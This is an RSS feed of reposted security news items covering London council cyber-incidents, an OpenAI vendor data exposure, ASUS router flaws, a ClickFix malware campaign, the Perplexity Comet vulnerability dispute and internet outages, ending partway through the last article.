<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/10/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Multiple London Councils Disrupted By Cyber-Attacks</title><link>https://nsaneforums.com/news/security-privacy-news/multiple-london-councils-disrupted-by-cyber-attacks-r32663/</link><description><![CDATA[<p>
	 
</p>

<p>
	 
</p>

<p>
	<span style="font-size:16px;">Royal Borough of Kensington and Chelsea, Westminster City Council, Hammersmith and Fulham Council affected by cyber-incident</span>
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="CityOfLondon-01-684x502.png" class="ipsImage" data-ratio="73.39" height="502" width="684" src="https://www.silicon.co.uk/wp-content/uploads/2023/07/CityOfLondon-01-684x502.png" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;">The City of London. Image credit: Financial Conduct Authority</span>
</p>

<p>
	 
</p>

<p>
	Several London councils have had services disrupted by cyber-attacks and said they are investigating whether data has been compromised.
</p>

<p>
	 
</p>

<p>
	The Royal Borough of Kensington and Chelsea (RBKC) and Westminster City Council said some of their shared IT infrastructure had been affected by a “cyber incident” and that systems including phone lines were disrupted.
</p>

<p>
	 
</p>

<p>
	RBKC said the two councils were working with specialists and GCHQ’s National Cyber Security Centre (NCSC) to protect data and restore services, while the Met Police is also investigating.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Disruption</strong></span>
</p>

<p>
	 
</p>

<p>
	Hammersmith and Fulham Council also said it had experienced a “serious cyber security incident” and was working to fix the problem as quickly as possible.
</p>

<p>
	 
</p>

<p>
	RBKC said its issue had been quickly identified on Monday and emergency plans had been activated so that services could continue to be delivered, adding that the Information Commissioner’s Office had been notified.
</p>

<p>
	 
</p>

<p>
	It said in a statement on its website that it was “investigating to see if any data has been compromised”.
</p>

<p>
	 
</p>

<p>
	The Hammersmith and Fulham Council statement suggested its issues could be connected with those of RBKC and Westminster councils.
</p>

<p>
	 
</p>

<p>
	A statement on its website said it was taking “precautionary measures to review, isolate and protect our networks”.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>Cyber-attacks</strong></span>
</p>

<p>
	 
</p>

<p>
	Hackney Council, which was affected by a serious cyber attack in 2020, told staff it had received intelligence that “multiple London councils have been targeted by cyber-attacks within the last 24-48 hours, with potential disruption to systems and services”.
</p>

<p>
	 
</p>

<p>
	The Information Commissioner’s Office last year reprimanded the council over the breach, saying it had found examples of a lack of proper security and processes to protect personal data.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.silicon.co.uk/security/cyberwar/london-councils-cyber-627649" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32663</guid><pubDate>Thu, 27 Nov 2025 12:59:15 +0000</pubDate></item><item><title>OpenAI confirms major data breach, exposing user's names, email addresses, and more &#x2014; "Transparency is important to us."</title><link>https://nsaneforums.com/news/security-privacy-news/openai-confirms-major-data-breach-exposing-users-names-email-addresses-and-more-%E2%80%94-transparency-is-important-to-us-r32661/</link><description><![CDATA[<h3>
	OpenAI is sending out emails this morning to confirm that a ton of user data has been exposed owing to a breach in a third-party web analytics tool called Mixpanel.
</h3>

<p id="77605594-5d82-436e-bf66-db5f91651eb6">
	Another day, another security breach. This time, it's <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt" data-before-rewrite-redirect="https://www.windowscentral.com/tag/openai" data-mrf-recirculation="inline-link" href="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt" rel="external nofollow">OpenAI</a>'s turn.
</p>

<p>
	 
</p>

<p>
	Today, users are waking up to discover emails from OpenAI's security team, confirming more security issues at the company. This one is a bit more egregious than previous breaches, exposing emails, names, and approximate locations of an undisclosed number of users.
</p>

<p>
	 
</p>


<p aria-hidden="true" id="77605594-5d82-436e-bf66-db5f91651eb6-2">
	OpenAI <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://openai.com/index/mixpanel-incident/" href="https://openai.com/index/mixpanel-incident/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">claims</a> that <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt" data-before-rewrite-redirect="https://www.windowscentral.com/tag/chatgpt" data-mrf-recirculation="inline-link" href="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt" rel="external nofollow">ChatGPT</a> users were unaffected, with chat content, API usage, passwords, payment details, and government IDs <em>remaining safe</em>. However, users of OpenAI's API interfaces at platform.openai.com have seen a variety of data exposed in this latest breach.
</p>

<p>
	 
</p>

<p aria-hidden="true">
	Here's what OpenAI claims has been exposed:
</p>

<p>
	 
</p>

<ul id="baaf0443-e581-4b2b-833f-01321d202a91">
	<li>
		Names provided to accounts on platform.openai.com
	</li>
	<li>
		Email addresses linked to the API accounts via platform.openai.com
	</li>
	<li>
		"Coarse approximate location" determined by IP address and web browser
	</li>
	<li>
		OS and browser type, as well as referring websites
	</li>
	<li>
		Organizations and user IDs saved into the API accounts
	</li>
</ul>

<p>
	 
</p>

<p id="dc327fa8-27f3-4440-9d80-4e16daad7e1a">
	The email to affected users reads as follows.
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	<em>"Transparency is important to us, so we want to inform you about a recent security incident at Mixpanel, a data analytics provider that OpenAI used for web analytics on the frontend interface for our API product (platform.openai.com). The incident occurred within Mixpanel's systems and involved limited analytics data related to your API account.</em>
</p>

<p style="margin-left: 40px;">
	 
</p>

<p style="margin-left: 40px;">
	<em>This was not a breach of OpenAI's systems. No chat, API requests, API usage data, passwords, credentials, API keys, payment details, or government IDs were compromised or exposed.</em>
</p>

<p>
	 
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-44XGqgt8Y3xkWjnMaS74jN">
	<div data-hydrate="true">
		<p>
			<em>On November 9, 2025, Mixpanel became aware of an attacker that gained unauthorized access to part of their systems and exported a dataset containing limited customer identifiable information and analytics information. Mixpanel notified OpenAI that they were investigating, and on November 25, 2025, they shared the affected dataset with us."</em>
		</p>

		<p>
			 
		</p>

		<p>
			OpenAI says it has shut down its interfacing with Mixpanel while it "investigates" the breach, and urges users to be additionally vigilant of phishing-type attacks and social engineering scams that might attempt to leverage the stolen data.
		</p>

		<h2 id="openai-controls-vast-swathes-of-very-personal-information-on-millions-of-people-3">
			OpenAI controls vast swathes of very personal information on millions of people
		</h2>

		<div>
			<div>
				<p>
					<picture data-new-v2-image="true"><source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-320-80.jpg.webp 320w" type="image/webp" /><img alt="Sam Altman, chief executive officer of OpenAI Inc., during a media tour of the Stargate AI data center in Abilene, Texas, US, on Tuesday, Sept. 23, 2025." class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/zFrSKZvhJedEbkC62hJXTT-1024-80.jpg" /></picture>
				</p>

				<p>
					<em><span>Your data? Our data. </span></em>
				</p>

				<p>
					<em><span itemprop="copyrightHolder">(Image credit: Getty Images | Bloomberg)</span></em>
				</p>

				<p>
					 
				</p>

				<p id="82e195ee-406b-4a2c-98b3-ddecdf70c0a6">
					It's not the first time <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt/did-chatgpt-deliberately-prioritize-engagement-over-safety" data-mrf-recirculation="inline-link" href="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt/did-chatgpt-deliberately-prioritize-engagement-over-safety" rel="external nofollow">OpenAI has been in hot water for its cavalier attitude towards user privacy and safety</a>. As individuals become increasingly comfortable baring their souls (and potentially confidential organizational data) to ChatGPT and other similar systems, security is becoming an increasingly hot topic for companies like OpenAI and Microsoft.
				</p>

				<p>
					 
				</p>

				<p>
					While no ChatGPT conversations or governmental IDs used for age verification were leaked in this breach, it's not exactly a huge vote of confidence that the firm allowed something like this to happen in the first place.
				</p>

				<p>
					 
				</p>

				<p>
					Data breaches of this type are incredibly common these days. I often use a variety of email aliases on my accounts to prevent potential breaches leading to all of my accounts becoming compromised, but it's a laborious process. Losing the anonymity of your account information is one thing, but I presume there are many ChatGPT users out there who probably wouldn't like their <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence" data-before-rewrite-redirect="https://www.windowscentral.com/tag/artificial-intelligence" data-mrf-recirculation="inline-link" href="https://www.windowscentral.com/artificial-intelligence" rel="external nofollow">AI</a> conversations leaked onto the web for a variety of reasons.
				</p>

				<p>
					 
				</p>

				<p>
					It's encouraging that OpenAI informed users just two days after receiving the affected user data set, but it would be ideal if things like this didn't happen at all.
				</p>

				<p>
					 
				</p>

				<p>
					Remember to slap multi-factor authentication on all of your accounts, folks.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/artificial-intelligence/openai-chatgpt/openai-confirms-major-data-breach-exposing-users-names-email-addresses-and-more-transparency-is-important-to-us" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Thursday 27 November 2025 at 6:00 pm AEST (my time).</em></span>
				</p>

				<p>
					<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of October): 5,009</em></span>
				</p>

				<p>
					<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
				</p>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">32661</guid><pubDate>Thu, 27 Nov 2025 08:01:21 +0000</pubDate></item><item><title>Proton Pass gets brand spanking new CLI client, available now to a limited subset of testers</title><link>https://nsaneforums.com/news/security-privacy-news/proton-pass-gets-brand-spanking-new-cli-client-available-now-to-a-limited-subset-of-testers-r32650/</link><description><![CDATA[<p>
	<a automate_uuid="0835ea1b-21e2-4219-8adc-009169c90577" href="https://www.neowin.net/news/proton-acquires-standard-notes-to-expand-its-service-ecosystem/" rel="external nofollow">Proton</a>, the company behind <a automate_uuid="782b63e6-a150-420a-8d0a-b44a6014d5c2" href="https://www.neowin.net/news/protonmail-for-ios-receives-its-biggest-ever-redesign-with-dark-mode-and-an-intuitive-ui/" rel="external nofollow">ProtonMail</a> and <a automate_uuid="7f028d43-3e4a-4ba3-bb9e-425e85637aa3" href="https://www.neowin.net/news/proton-launches-redesigned-vpn-client-for-windows-with-new-profiles-feature/" rel="external nofollow">ProtonVPN</a>, has announced a new tool called Proton Pass Command-Line Interface (CLI), extending its Proton Pass password manager offering. The new tool has been created to make Proton Pass data easily accessible in the terminal for development, scripting, and automation, including Continuous Integration/Continuous Delivery (CI/CD) pipelines.
</p>

<p>
	 
</p>

<p>
	Proton Pass CLI is currently in beta, so there may be some issues with it if you use it right now. To ensure it doesn't leave a bad taste among a wide base of users, its use is currently restricted to Visionary supporters. This early access also rewards them for being the best-paying customers. The company said that broader availability across paid plans is coming soon.
</p>

<p>
	 
</p>

<p>
	The new tool provides a secure way to access and manage Proton Pass items and vaults from the terminal. It is made secure by preserving the end-to-end encryption we are used to in the Proton Pass app. Aside from accessing your items, you can view, create, update, and delete various item types, including passwords, secure notes, credit cards, identities, WiFi entries, custom items, and stored SSH-key items. You can also create, read, update, and delete vaults.
</p>

<p>
	 
</p>

<p>
	Other things you can do include:
</p>

<p>
	 
</p>

<ul>
	<li>
		Manage member access and permissions to shared vaults and items.
	</li>
	<li>
		Work in headless environments (CI/CD, servers, containers) using app-password authentication.
	</li>
	<li>
		Create simple scripted workflows and task automation.
	</li>
</ul>

<p>
	 
</p>

<p>
	With the Proton Pass CLI tool, Proton hopes to boost your speed and productivity when it comes to automation and scripting by automating credential-management tasks and eliminating manual copy-paste or UI steps. It also enables secure and simple shared credential management that lets you automate managing access and permissions to shared items and vaults directly from the CLI.
</p>

<p>
	 
</p>

<p>
	An advanced feature of this tool is secure secret injection. This allows you to inject credentials directly into scripts, deployments, and CI/CD pipelines without exposing secrets in plaintext, logs, or command history. Finally, this tool helps to reduce the complexity of automation with support for simple, secure app-password authentication across all environments, reducing the need for complex infrastructure or add-on products.
</p>

<p>
	 
</p>

<p>
	You can get started by following <a automate_uuid="ffeb1af0-45e9-4879-90b2-a86d4b4e3ee0" href="https://protonpass.github.io/pass-cli/" rel="external nofollow">Proton's instructions</a>.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/proton-pass-gets-brand-spanking-new-cli-client-available-now-to-a-limited-subset-of-testers/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Thursday 27 November 2025 at 5:57 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32650</guid><pubDate>Wed, 26 Nov 2025 19:57:27 +0000</pubDate></item><item><title>ASUS warns of new critical auth bypass flaw in AiCloud routers</title><link>https://nsaneforums.com/news/security-privacy-news/asus-warns-of-new-critical-auth-bypass-flaw-in-aicloud-routers-r32649/</link><description><![CDATA[<p>
	ASUS has released new firmware to patch nine security vulnerabilities, including a critical authentication bypass flaw in routers with AiCloud enabled.
</p>

<p>
	 
</p>

<p>
	AiCloud is a cloud-based remote access feature that comes with many ASUS routers, turning them into private cloud servers for remote media streaming and cloud storage.
</p>

<p>
	 
</p>

<p>
	As the Taiwanese electronics manufacturer explained, the <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59366" rel="external nofollow" target="_blank">CVE-2025-59366</a> vulnerability "can be triggered by an unintended side effect of the Samba functionality, potentially leading to allow execution of specific functions without proper authorization."
</p>

<p>
	 
</p>

<p>
	Remote attackers without privileges can exploit it by chaining a path traversal and an OS command injection weakness in low-complexity attacks that don't require user interaction.
</p>

<p>
	 
</p>

<p>
	"To protect your devices, ASUS strongly recommends that all users update their router firmware to the latest version immediately," the company <a href="https://www.asus.com/security-advisory/#:~:text=Security%20Update%20for%20ASUS%20Router%20Firmware" rel="external nofollow" target="_blank">said in a Monday advisory</a>.
</p>

<p>
	 
</p>

<p>
	"Update your router with the newest firmware. We encourage you to do this when new firmware becomes available."
</p>

<p>
	 
</p>

<table align="center" border="1px solid black;" cellspacing="0" style="border-collapse:collapse; width:390px">
	<tbody>
		<tr>
			<td style="background-color:#eeeeee; width:221px">
				<strong>Firmware</strong>
			</td>
			<td style="background-color:#eeeeee; width:161px">
				<strong>CVE</strong>
			</td>
		</tr>
		<tr>
			<td style="width:221px">
				<p>
					3.0.0.4_386 series
				</p>
			</td>
			<td rowspan="3" style="width:161px">
				CVE-2025-59365<br>
				CVE-2025-59366<br>
				CVE-2025-59368<br>
				CVE-2025-59369<br>
				CVE-2025-59370<br>
				CVE-2025-59371<br>
				CVE-2025-59372<br>
				CVE-2025-12003
			</td>
		</tr>
		<tr>
			<td style="width:221px">
				<p>
					3.0.0.4_388 series
				</p>
			</td>
		</tr>
		<tr>
			<td style="width:221px">
				<p>
					3.0.0.6_102 series
				</p>
			</td>
		</tr>
	</tbody>
</table>

<p>
	 
</p>

<p>
	While ASUS didn't specify which router models are affected and only mentioned which firmware versions address the vulnerability, it provided mitigation measures for users with end-of-life models that will not receive firmware updates.
</p>

<p>
	 
</p>

<p>
	To block potential attacks without patching their routers, users are advised to disable any services accessible from the Internet, including remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port triggering, and FTP, as well as to cut remote access to devices running AiCloud software vulnerable to CVE-2025-59366 attacks.
</p>

<p>
	 
</p>

<p>
	ASUS also advised taking additional measures to reduce the attack surface and secure the routers against potential attacks, including using strong passwords for the router administration page and wireless networks.
</p>

<p>
	 
</p>

<p>
	In April, ASUS <a href="https://www.bleepingcomputer.com/news/security/asus-warns-of-critical-auth-bypass-flaw-in-routers-using-aicloud/" rel="external nofollow" target="_blank">patched</a> another critical authentication bypass flaw (<a href="https://nvd.nist.gov/vuln/detail/CVE-2025-2492" rel="external nofollow" target="_blank">CVE-2025-2492</a>) that can be triggered by a crafted request targeting routers with AiCloud enabled.
</p>

<p>
	 
</p>

<p>
	Along with six other security vulnerabilities, CVE-2025-2492 has been exploited to hijack thousands of ASUS WRT routers in a global campaign called <a href="https://www.bleepingcomputer.com/news/security/new-wrthug-campaign-hijacks-thousands-of-end-of-life-asus-routers/" rel="external nofollow" target="_blank">Operation WrtHug</a>, which targeted end-of-life or outdated devices from Taiwan and across Southeast Asia, Russia, Central Europe, and the United States.
</p>

<p>
	 
</p>

<p>
	SecurityScorecard researchers who spotted the attacks believe the hijacked routers may be used as operational relay boxes (ORB) in Chinese hacking operations, as stealth relay nodes for proxying and hiding command-and-control infrastructure.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/asus-warns-of-new-critical-auth-bypass-flaw-in-aicloud-routers/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Thursday 27 November 2025 at 5:55 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32649</guid><pubDate>Wed, 26 Nov 2025 19:56:50 +0000</pubDate></item><item><title>ClickFix attack uses fake Windows Update screen to push malware</title><link>https://nsaneforums.com/news/security-privacy-news/clickfix-attack-uses-fake-windows-update-screen-to-push-malware-r32623/</link><description><![CDATA[<p>
	ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.
</p>

<p>
	 
</p>

<p>
	ClickFix is a social-engineering attack in which users are convinced to paste and execute code or commands in the Windows Command Prompt that lead to malware running on the system.
</p>

<p>
	 
</p>

<p>
	The attack has been widely adopted by cybercriminals across all tiers due to its high effectiveness and has continually evolved, with <a href="https://www.bleepingcomputer.com/news/security/clickfix-malware-attacks-evolve-with-multi-os-support-video-tutorials/" rel="external nofollow" target="_blank">increasingly</a> advanced and deceptive lures.
</p>

<h3>
	Fullscreen browser page
</h3>

<p>
	Since October 1st, researchers have observed ClickFix attacks where the pretense for executing dangerous commands was completing the installation of a critical Windows security update and the more common "human verification" lure [<a href="https://www.bleepingcomputer.com/news/security/clickfix-attack-delivers-infostealers-rats-in-fake-bookingcom-emails/" rel="external nofollow" target="_blank">1</a>, <a href="https://www.bleepingcomputer.com/news/security/clickfix-malware-attacks-evolve-with-multi-os-support-video-tutorials/" rel="external nofollow" target="_blank">2</a>].
</p>

<p>
	 
</p>

<p>
	The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes commands from the attacker that were automatically copied to the clipboard via JavaScript running on the site.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Fake Windows security update screen" class="ipsImage" height="409" width="720" src="https://www.bleepstatic.com/images/news/u/1100723/ClickFix_attack.png">
		<figcaption>
			<em>Fake Windows security update screen<br>
			Source: BleepingComputer</em>
		</figcaption>
	</figure>
</div>

<p>
	A report from managed security services provider Huntress notes that the new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers.
</p>

<p>
	 
</p>

<p>
	In one variant, the hackers use a human verification page, while in another they rely on the fake Windows Update screen.
</p>

<p>
	 
</p>

<p>
	In both cases, though, the threat actors used steganography to encode the final malware payload inside an image.
</p>

<p>
	 
</p>

<p>
	"Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload in memory," Huntress <a href="https://www.huntress.com/blog/clickfix-malware-buried-in-images" rel="external nofollow" target="_blank">researchers explain</a>.
</p>

<p>
	 
</p>

<p>
	Delivering the final payload starts with using the <em>mshta</em> Windows-native binary to execute malicious JavaScript code.
</p>

<p>
	 
</p>

<p>
	The entire process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state.
</p>

<p>
	 
</p>

<p>
	Inside Stego Loader’s manifest resources, there is an AES-encrypted blob that is actually a steganographic PNG file containing shellcode that is reconstructed using custom C# code.
</p>

<p>
	 
</p>

<p>
	Huntress researchers noticed that the threat actor used a dynamic evasion tactic, commonly referred to as a trampoline, where the entry point function started calling 10,000 empty functions.
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Trampoline call chain" class="ipsImage" height="600" style="height: auto;" width="467" src="https://www.bleepstatic.com/images/news/u/1220909/2025/November/trampoline.jpg">
		<figcaption>
			<em>Trampoline call chain<br>
			Source: Huntress</em>
		</figcaption>
	</figure>
</div>

<p>
	The shellcode holding the infostealer samples is extracted from the encrypted image and is packed using the Donut tool that allows executing VBScript, JScript, EXE, DLL files, and .NET assemblies in memory.
</p>

<p>
	 
</p>

<p>
	After unpacking, Huntress researchers were able to retrieve the malware, which in the analyzed attacks was LummaC2 and Rhadamanthys.
</p>

<p>
	 
</p>

<p>
	The diagram below serves as a visual representation of how the entire attack works:
</p>

<p>
	 
</p>

<div style="">
	<figure class="image" style="display:inline-block">
		<img alt="Overview of the attack" class="ipsImage" height="481" style="height: auto;" width="900" src="https://www.bleepstatic.com/images/news/u/1220909/2025/November/overview.jpg">
		<figcaption>
			<em>Overview of the attack<br>
			Source: Huntress</em>
		</figcaption>
	</figure>
</div>

<p>
	The Rhadamanthys variant that used the Windows Update lure was <a href="https://x.com/Reid0nly/status/1980416054204723413" rel="external nofollow" target="_blank">first spotted</a> by researchers back in October, before Operation Endgame took down parts of its infrastructure <a href="https://www.bleepingcomputer.com/news/security/police-disrupts-rhadamanthys-venomrat-and-elysium-malware-operations/" rel="external nofollow" target="_blank">on November 13</a>.
</p>

<p>
	 
</p>

<p>
	Huntress reports that the law enforcement operation resulted in the payload not being delivered anymore on the fake Windows Update domains, which are still active.
</p>

<p>
	 
</p>

<p>
	To stay safe from this type of ClickFix attack, the researchers recommend disabling the Windows Run box and monitoring for suspicious process chains such as <em>explorer.exe</em> spawning <em>mshta.exe</em> or PowerShell.
</p>

<p>
	 
</p>

<p>
	Additionally, when investigating a cybersecurity incident, analysts can check the RunMRU registry key to see if the user entered commands in the Windows Run box.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">

<p>
	<span style="font-size:12px;"><em>Posted Tuesday 25 November 2025 at 4:58 pm AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">32623</guid><pubDate>Tue, 25 Nov 2025 06:59:03 +0000</pubDate></item><item><title>Perplexity responds to Comet browser vulnerability claims, argues "fake news"</title><link>https://nsaneforums.com/news/security-privacy-news/perplexity-responds-to-comet-browser-vulnerability-claims-argues-fake-news-r32600/</link><description><![CDATA[<p>
	<span><span>Researchers said Comet can be abused to execute local commands - Perplexity says otherwise</span></span>
</p>

<p>
	 
</p>

<ul>
	<li>
		<strong>SquareX accused Perplexity’s Comet browser of exposing a hidden MCP API that could enable local command execution</strong>
	</li>
	<li>
		<strong>Perplexity rejected the claims as “entirely false,” stressing the API requires developer mode, user consent, and manual sideloading</strong>
	</li>
	<li>
		<strong>SquareX countered, saying Comet was silently updated after its proof‑of‑concept, and that external researchers replicated the attack</strong>
	</li>
</ul>

<p>
	 
</p>

<p>
	Cybersecurity company SquareX recently accused Perplexity of keeping a major vulnerability in its AI browser, Comet - the latter has now responded, saying the research report is “entirely false” and part of a growing “fake security research” problem.
</p>

<p>
	 
</p>

<p>
	SquareX had said it found a hidden API in the Comet browser, capable of executing local commands. That API, named MCP API, allows its embedded extensions to execute arbitrary local commands on users’ devices, capabilities that traditional browsers explicitly prohibit.
</p>

<p>
	 
</p>

<p>
	SquareX said it found the API in the Agentic extension, which can be triggered by the perplexity.ai page, meaning that should anyone break into the Perplexity site, they will have access to devices of all of its users.
</p>

<p>
	 
</p>

<p>
	<span><strong>Perplexity's response</strong></span>
</p>

<p>
	 
</p>

<p>
	For Kabilan Sakthivel, a researcher at SquareX, not adhering to the strict security controls the industry has evolved “reverses the clock on decades of browser security principles established by vendors like Chrome, Safari and Firefox.”
</p>

<p>
	 
</p>

<p>
	But Perplexity begs to differ, noting in a written response sent to TechRadar Pro by spokesperson Jesse Dwyer that the report is “entirely false”.
</p>

<p>
	 
</p>

<p>
	The company added the vulnerability requires a human to do the work, not the Comet Assistant, and it requires the developer mode to be turned on.
</p>

<p>
	 
</p>

<p>
	“To replicate this, the human user must turn on developer mode and manually sideload malware into Comet," it said.
</p>

<p>
	 
</p>

<p>
	Perplexity also said that Comet not explicitly obtaining user consent for any local system access is “categorically false”.
</p>

<p>
	 
</p>

<p>
	“When installing local MCPs we require user consent--users are the ones setting it up and calling the MCP API. They specify exactly what command to run,” Dwyer wrote. “Any additional command from the MCP (ex. AI tool calling) also requires user confirmation.”
</p>

<p>
	 
</p>

<p>
	Furthermore, Perplexity says that what SquareX describes as a “hidden API” is in fact “simply how Comet can run MCPs locally”, with permission and user consent first obtained.
</p>

<p>
	 
</p>

<p>
	“This is SquareX's second time presenting false security research. The first one we also proved was false,” he stressed.
</p>

<p>
	 
</p>

<p>
	Dwyer also disputes SquareX’s claim that it submitted a report. “Instead, they sent a link to a Google doc, with no context, and no access. We informed them we were unable to open the Google docs, requested access to the google docs, and never heard a reply nor were granted access to the docs.”
</p>

<p>
	<br />
	<span style="font-size:20px;"><strong>SquareX also fires back</strong></span>
</p>

<p>
	 
</p>

<p>
	But SquareX isn’t backing down, either.
</p>

<p>
	 
</p>

<p>
	The company also said it spotted Perplexity making a “silent update” to Comet, in which the same POC will now return “Local MCP is not enabled”.
</p>

<p>
	 
</p>

<p>
	It claims to have had three external researchers replicate the attack, and that Perplexity fixed it a few hours ago.
</p>

<p>
	 
</p>

<p>
	“This is excellent news from a security perspective and we are glad that our research could contribute to making the AI Browser safer,” SquareX concluded, adding that it did not hear back from Perplexity on its VDP submission.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.techradar.com/pro/security/perplexity-responds-to-comet-browser-vulnerability-claims-argues-fake-news" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">32600</guid><pubDate>Sun, 23 Nov 2025 15:52:42 +0000</pubDate></item><item><title>Severe internet outages keep happening &#x2014; and they might get worse</title><link>https://nsaneforums.com/news/security-privacy-news/severe-internet-outages-keep-happening-%E2%80%94-and-they-might-get-worse-r32599/</link><description><![CDATA[<p>
	&lt; Please watch the video at the <a href="https://www.nbcnews.com/tech/internet/internet-outages-aws-microsoft-cloudflare-rcna245043" rel="external nofollow">source page</a>. &gt;
</p>

<p>
	 
</p>

<p>
	<span style="font-size:16px;">Growing reliance on a handful of major internet infrastructure companies has led to major disruptions, sparking everything from political pressure to computer science memes.</span>
</p>

<p>
	 
</p>

<p>
	It’s not just you — internet outages severe enough to disrupt everyday services for many people have become more frequent and wide-ranging, experts say.
</p>

<p>
	 
</p>

<p>
	When internet services company Cloudflare crashed Tuesday — prompting significant, hourslong disruptions at companies ranging from X to OpenAI to Discord — it was the third major internet outage in the space of about a month.
</p>

<p>
	 
</p>

<p>
	While there’s plenty of finger-pointing to go around, two things are clear: Popular consumer businesses increasingly rely on a handful of giant companies that run things more cheaply in the cloud, and when one of those companies isn’t extraordinarily careful, an obscure software vulnerability or tiny mistake can reverberate through to many of their customers, making it seem like half the internet has been unplugged.
</p>

<p>
	 
</p>

<p>
	“This spate of outages has been uniquely terrible,” said Erie Meyer, the former chief technical officer of the Consumer Financial Protection Bureau under the Biden administration. “It’s like what we were told Y2K would be like, and it’s happening more often.”
</p>

<p>
	It’s become a common enough occurrence that jokes about the failures, rooted in an understanding of the basics of internet infrastructure, have become popular memes in the computer science world.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedOther" contenteditable="false">
	<iframe allowfullscreen="" data-controller="core.front.core.autosizeiframe" data-embedid="embed5327941893" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/krishdotdev/status/1991511891030790639?ref_src=twsrc%255Etfw%257Ctwcamp%255Etweetembed%257Ctwterm%255E1991511891030790639%257Ctwgr%255Edfcb66a857bde3f0d80d4bf93507323b3fd1111a%257Ctwcon%255Es1_%26ref_url=https://iframe.nbcnews.com/RO5WYzgf?_showcaption=trueapp=1"></iframe>
</div>

<p>
	Major cloud companies are often referred to as hyperscalers, meaning once they have established a viable business, it can be relatively straightforward to rapidly build out their infrastructure and offer those services at competitive prices. That has resulted in a handful of companies dominating the industry, which critics note creates single points of failure when something goes wrong.
</p>

<p>
	 
</p>

<p>
	“When one company’s bug can derail everyday life, that’s not just a technical issue, that’s consolidation,” Meyer said.
</p>

<p>
	 
</p>

<p>
	Outages are as old as the internet. But since late October there have been three major ones — an unprecedented number for such a short span of time — that caused serious problems for wide swaths of people.
</p>

<p>
	 
</p>

<p>
	The first was Amazon Web Services on Oct. 20, taking with it many people’s access to everything from gaming platforms Roblox and Fortnite to Ring cameras. It reportedly kept some from being able to operate their internet-connected smart beds.
</p>

<p>
	 
</p>

<p>
